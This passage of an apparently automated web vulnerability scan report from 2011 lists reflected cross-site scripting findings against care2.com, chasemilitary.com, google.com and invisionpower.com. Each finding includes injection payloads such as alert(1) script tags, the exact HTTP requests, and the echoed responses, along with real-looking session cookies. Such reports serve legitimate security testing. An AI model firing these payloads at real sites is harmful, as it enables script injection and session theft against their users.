3.90. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c432</script><script>alert(1)</script>593046afd78 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html4c432</script><script>alert(1)</script>593046afd78 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 01:07:40 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=4a49c31771737435e71c497a27a4ef68%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=580b27568625e1c9c22011d9bba42f4c%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 01:07:41 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:07:41 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 76015

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="Care2 : Green Living : Channel : Bluefin-tuna-sells-for-396000.html4c432</script><script>alert(1)</script>593046afd78"
s.server="www.care2.com"
s.channel="Greenliving"
s.pageType=""
s.prop3="Greenliving"
s.prop16="Unregistered"
s.prop22="GL Channel : bluefin-tuna-sells-for-396000.html4c432</script>
...[SNIP]...

3.91. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2fbf</script><script>alert(1)</script>5ef21547687 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html?c2fbf</script><script>alert(1)</script>5ef21547687=1 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:07:06 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=76875f7136cd6b6fa77b12431af6f845%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=a29576ec1e14546db9a5710320918bfb%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:07:06 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 144724

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
-1555312', 'mouseover', function(){memberRollover.mem(this);;});
new CARE2.prime.PillManager('d9a3e6ff-1');
function onFacebookConnect() {
var pg = "/greenliving/bluefin-tuna-sells-for-396000.html?c2fbf</script><script>alert(1)</script>5ef21547687=1" + "#comment_form";
C2FBConnect.onConnect(pg);
}
FB.init("dfc27a7e48d90111634fd0bbe8eb73d7", "/fb/xd_receiver.htm");
if($('newCommentForm')) {

var theForm = $('newCommentForm').getElementsB
...[SNIP]...

3.92. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3605</script><script>alert(1)</script>a13efd1020b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html?a3605</script><script>alert(1)</script>a13efd1020b=1 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:07:20 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=9f2472a448b873474901c8c8211d15c4%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=e5dde59e923be04df3ab69c16d9aa184%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:07:21 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 144725

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
<script type="text/javascript">

function loadCommentPage(page, numPerPage, itemID)
{
var sPath = '/greenliving/bluefin-tuna-sells-for-396000.html?a3605</script><script>alert(1)</script>a13efd1020b=1';
var charForQueryString = (sPath.indexOf("?") != -1) ? "&" : "?";
var servlet = charForQueryString + 'Care2CommentPageAJAX=1&page='+page+'&commentsPerPage='+numPerPage+'&itemID='+itemID;

...[SNIP]...

3.93. http://www.care2.com/greenliving/bluefin-tuna-sells-for-396000.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.care2.com
Path:   /greenliving/bluefin-tuna-sells-for-396000.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9beb"><script>alert(1)</script>7188eebfdad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f9beb\"><script>alert(1)</script>7188eebfdad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /greenliving/bluefin-tuna-sells-for-396000.html?f9beb"><script>alert(1)</script>7188eebfdad=1 HTTP/1.1
Host: www.care2.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:06:50 GMT
Server: Apache/2.2.8
Set-Cookie: c2_user_state=0e4516f4eaebfc055e9af2d16a87a343%3A0; path=/; domain=.care2.com
Set-Cookie: c2_user_state=b3342346d15f1b20be2442ecb6ff0483%3A0; path=/; domain=.care2.com
X-Pingback: http://www.care2.com/greenliving2/xmlrpc.php
Set-Cookie: geoip=223; expires=Thu, 10-Feb-2011 01:06:51 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 144742

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="http://www.facebook.com/2008/fbml
...[SNIP]...
<input type="hidden" name="pg" value="/greenliving/bluefin-tuna-sells-for-396000.html?f9beb\"><script>alert(1)</script>7188eebfdad=1#comment_form" />
...[SNIP]...

3.94. http://www.chasemilitary.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chasemilitary.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8517f"%3balert(1)//55b2694a95c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8517f";alert(1)//55b2694a95c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?8517f"%3balert(1)//55b2694a95c=1 HTTP/1.1
Host: www.chasemilitary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=OVMPLYS727Bec7OCKKLW; path=/
Cache-Control: private
Content-Length: 68609
Content-Type: text/html; charset=utf-8
Set-Cookie: ASP.NET_SessionId=rehnjh55ru5bdbjfzqdu5vzl; path=/; HttpOnly
Date: Wed, 02 Feb 2011 22:16:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv
...[SNIP]...
'false',
allowScriptAccess: 'always',
wmode: 'window'
};
var flashvarsADA = {}
flashvarsADA.adaLink = "Default.aspx?ada=true%268517F";ALERT(1)//55B2694A95C=1%26";
var attributes = false;
swfobject.embedSWF('http://www.chasemilitary.com/swf/ADAredirect.swf', 'ada', '0.5', '0.5', '8.0.0', false, flashvarsADA, paramsADA, attributes
...[SNIP]...

3.95. http://www.chasemilitary.com/Default.aspx [ada parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chasemilitary.com
Path:   /Default.aspx

Issue detail

The value of the ada request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab183"%3balert(1)//884aa7f60f1 was submitted in the ada parameter. This input was echoed as ab183";alert(1)//884aa7f60f1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Default.aspx?ada=trueab183"%3balert(1)//884aa7f60f1 HTTP/1.1
Host: www.chasemilitary.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; ARPT=OVMPLYSilkbyCKKWU; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.2.10.1296685136; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68621
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 01:06:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv
...[SNIP]...
,
allowScriptAccess: 'always',
wmode: 'window'
};
var flashvarsADA = {}
flashvarsADA.adaLink = "Default.aspx?ada=true%26ADA=trueab183";alert(1)//884aa7f60f1%26";
var attributes = false;
swfobject.embedSWF('http://www.chasemilitary.com/swf/ADAredirect.swf', 'ada', '0.5', '0.5', '8.0.0', false, flashvarsADA, paramsADA, attributes);
...[SNIP]...

3.96. http://www.chasemilitary.com/Default.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.chasemilitary.com
Path:   /Default.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8d08"%3balert(1)//c9371ab82a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e8d08";alert(1)//c9371ab82a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Default.aspx?e8d08"%3balert(1)//c9371ab82a8=1 HTTP/1.1
Host: www.chasemilitary.com
Proxy-Connection: keep-alive
Referer: http://www.chasemilitary.com/?8517f%22%3balert(document.cookie)//55b2694a95c=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ARPT=OVMPLYSilkbyCKKWU; ASP.NET_SessionId=jqii4q45b3tjcm45z5wnoz45; __utmz=182020341.1296685136.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; __utma=182020341.2094967643.1296685136.1296685136.1296685136.1; __utmc=182020341; __utmb=182020341.1.10.1296685136

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 68609
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 00:07:27 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv
...[SNIP]...
'false',
allowScriptAccess: 'always',
wmode: 'window'
};
var flashvarsADA = {}
flashvarsADA.adaLink = "Default.aspx?ada=true%26E8D08";ALERT(1)//C9371AB82A8=1%26";
var attributes = false;
swfobject.embedSWF('http://www.chasemilitary.com/swf/ADAredirect.swf', 'ada', '0.5', '0.5', '8.0.0', false, flashvarsADA, paramsADA, attributes
...[SNIP]...

3.97. http://www.google.com/advanced_search [hl parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The value of the hl request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bdade(a)d80aea01345 was submitted in the hl parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?q=ipboard+software&hl=enbdade(a)d80aea01345&prmd=ivns HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:09:09 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
alse,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?q\x3dipboard+software\x26amp;hl\x3denbdade(a)d80aea01345\x26amp;prmd\x3divns')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

3.98. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f394a(a)d2919261fa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?f394a(a)d2919261fa0=1 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:08:40 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
t()});
})();
;}catch(e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?f394a(a)d2919261fa0\x3d1')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

3.99. http://www.google.com/advanced_search [prmd parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The value of the prmd request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload a960d(a)ecab87e67a8 was submitted in the prmd parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?q=ipboard+software&hl=en&prmd=ivnsa960d(a)ecab87e67a8 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:09:14 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?q\x3dipboard+software\x26amp;hl\x3den\x26amp;prmd\x3divnsa960d(a)ecab87e67a8')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

3.100. http://www.google.com/advanced_search [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4db85(a)700ed73b9bc was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /advanced_search?q=ipboard+software4db85(a)700ed73b9bc&hl=en&prmd=ivns HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:09:05 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
e){google.ml(e,false,{'cause':'defer'});}if(google.med) {google.med('init');google.initHistory();google.med('history');}google.History&&google.History.initialize('/advanced_search?q\x3dipboard+software4db85(a)700ed73b9bc\x26amp;hl\x3den\x26amp;prmd\x3divns')});if(google.j&&google.j.en&&google.j.xi){window.setTimeout(google.j.xi,0);}</script>
...[SNIP]...

3.101. http://www.google.com/images [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.google.com
Path:   /images

Issue detail

The value of the q request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6e290(a)d4e0b417516 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images?q=ipboard+software6e290(a)d4e0b417516&um=1&ie=UTF-8&source=og&sa=N&hl=en&tab=wi HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:11:25 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>ipboard software6e290(a)d4e0b417516 - Google Search</title><script>window.google={kEI:"vQBKTbagDIGglAfU_Nz9
...[SNIP]...
location.hash;if(a&&a.indexOf("start")>-1){var b=window.dyn.setResults;window.dyn.setResults=function(){window.dyn.setResults=b}}}v();
}) ();dyn.initialize('\x26prev\x3d/images%3Fq%3Dipboard%2Bsoftware6e290(a)d4e0b417516%26um%3D1%26hl%3Den%26sa%3DN%26tbs%3Disch:1\x26ei\x3dvQBKTbagDIGglAfU_Nz9Dw',0,1);dyn.setResults([]);</script>
...[SNIP]...

3.102. http://www.invisionpower.com/products/board/features/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.invisionpower.com
Path:   /products/board/features/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 95e51--><a>1fddadebe75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/board/features/?95e51--><a>1fddadebe75=1 HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:01 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=75d748bd55859c58635f5c6022ec9255; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:01 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16435

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<!-- ?95e51--><a>1fddadebe75=1 -->
...[SNIP]...

3.103. http://www.invisionpower.com/products/nexus/features/store.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.invisionpower.com
Path:   /products/nexus/features/store.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5e722--><a>6ccf7c9b600 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/nexus/features/store.php?5e722--><a>6ccf7c9b600=1 HTTP/1.1
Host: www.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: session_id=5448c7f0339a037ee6ed90cf3994b4cf; __utmz=61175156.1296685558.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ipboard%20software; PAPVisitorId=7432e15fddd3a34a2d79b00lmU2qECVV; __utma=61175156.1901611536.1296685558.1296685558.1296685558.1; __utmc=61175156; __utmb=61175156.1.10.1296685558;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:14 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: session_id=afd5acf1c08a7662de6d8859ba720860; path=/; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 01:16:14 GMT
Pragma: no-cache
